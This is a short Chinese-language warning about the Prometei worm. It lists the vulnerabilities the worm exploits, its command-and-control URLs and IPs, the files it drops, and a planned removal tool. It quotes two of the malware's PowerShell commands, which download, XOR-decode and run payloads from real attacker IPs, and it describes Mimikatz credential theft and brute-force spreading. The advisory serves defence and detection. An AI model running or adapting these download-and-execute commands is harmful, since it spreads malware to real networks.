最新病毒预警--Prometei 蠕虫病毒

近日，蠕虫病毒Prometei正在全网传播。该病毒通过横向渗透攻击方式对局域网中的终端进行大面积入侵，并且可以跨平台（Window、Linux、macOS等系统）横向传播。提醒广大用户，尤其是企业、政府部门、学校、医院等拥有大型局域网机构，及时做好排查与防护工作，避免受到该病毒影响

病毒名称：Prometei

病毒种类：Trojan/Prometei.a

利用漏洞：永恒之蓝漏洞、Redis未授权访问漏洞、BlueKeep漏洞、Apache Log4j漏洞

注意事项1:Win7用户及时打上永恒之蓝补丁！

传播途径：局域网

注意事项1:尽量不要连接来路不明的网络以及公共网络

C&C服务器：

URL：
http://p2.feefreepool.net/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
http://p3.feefreepool.net/cgi-bin/prometei.cgi
http://dummy.zero/cgi-bin/prometei.cgi
IP：
23.94.251.245
104.130.132.131
88.198.246.242
注意事项1:建议把URL写入hosts文件进行屏蔽，防止病毒更新

释放文件:

C:\Windows\dell\sqhost.exe
C:\Windows\dell\sqhost_new.exe
C:\Windows\dell\install.cmd
C:\Windows\dell\rdpclip_new.exe
C:\Windows\dell\updates1_new.7z
C:\Windows\dell\updates2_new.7z
C:\Windows\dell\netwalker_new
C:\Windows\dell\uplugplay_new

执行命令：

病毒下载命令
病毒接收到后门指令后，会通过命令行执行PowerShell脚本，下载、解压含有恶意文件的压缩包（updata.7z），执行解压后的install.cmd


powershell "if(-not (Test-Path 'C:\Windows\dell\sqhost.exe')) {(New-Object
Net.WebClient).DownloadFile('http://104.130.132.131/update.7z','update.7z');Start-
Process cmd.exe -ArgumentList '/c taskkill -f -im rdpclip.exe&sqhost -shalchk 0DE3401BB72D31AE94B899FEF25483E3D424DCDC update.7z&ping -n 2 127.0.0.3&7z x update.7z -phorhorl23 -oC:\Windows\dell -y&install.cmd';}"

执行install.bat
install内容：
RdpCIip横向传播模块
RdpCIip横向传播模块会对局域网内所有的机器进行扫描，如：SMB、Redis、RPC、RDP、Apache、SSH、SQL Server、PostgreSQL服务端口，针对上述服务进行暴破攻击以及漏洞攻击(“永恒之蓝”、BlueKeep、ApacheLog4j 漏洞、Redis未经授权访问漏洞等)，拥有大型局域网的政企机构面临较大的安全风险。在局域网暴破之前会通过miwalk模块（Mimikatz）获取系统登录凭证，通过获取的登录凭证和自带弱口令字典进行横向暴破攻击。攻击成功之后，被攻击主机会执行一段恶意代码。恶意代码会调用PowerShell命令，从服务器下载主模块并执行


cmd /C echo 123>C:\Windows\mshlpda32. dll
&powershell $p='C:\windows\zsvc.exe';
(New-Object Net.WebClient).DownloadFile('http://23.94.251.245/k.php? B=_%PROCESSOR_ARCHITECTURE%J%COMPUTERNAME%,XXXXXXXXXXXXXXXX@\$p);
$d=[IO.File]::ReadAllBytes($p);
$t=New-Object Byte[]($d.Length);
[int]$j=0;
for([int]$i=0;$i -It $d.Length;$i++) {$j+=66;$t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255; }
[io.file]::WriteAllBytes($p?  );
Start-Process $p;

病毒专杀：马上写完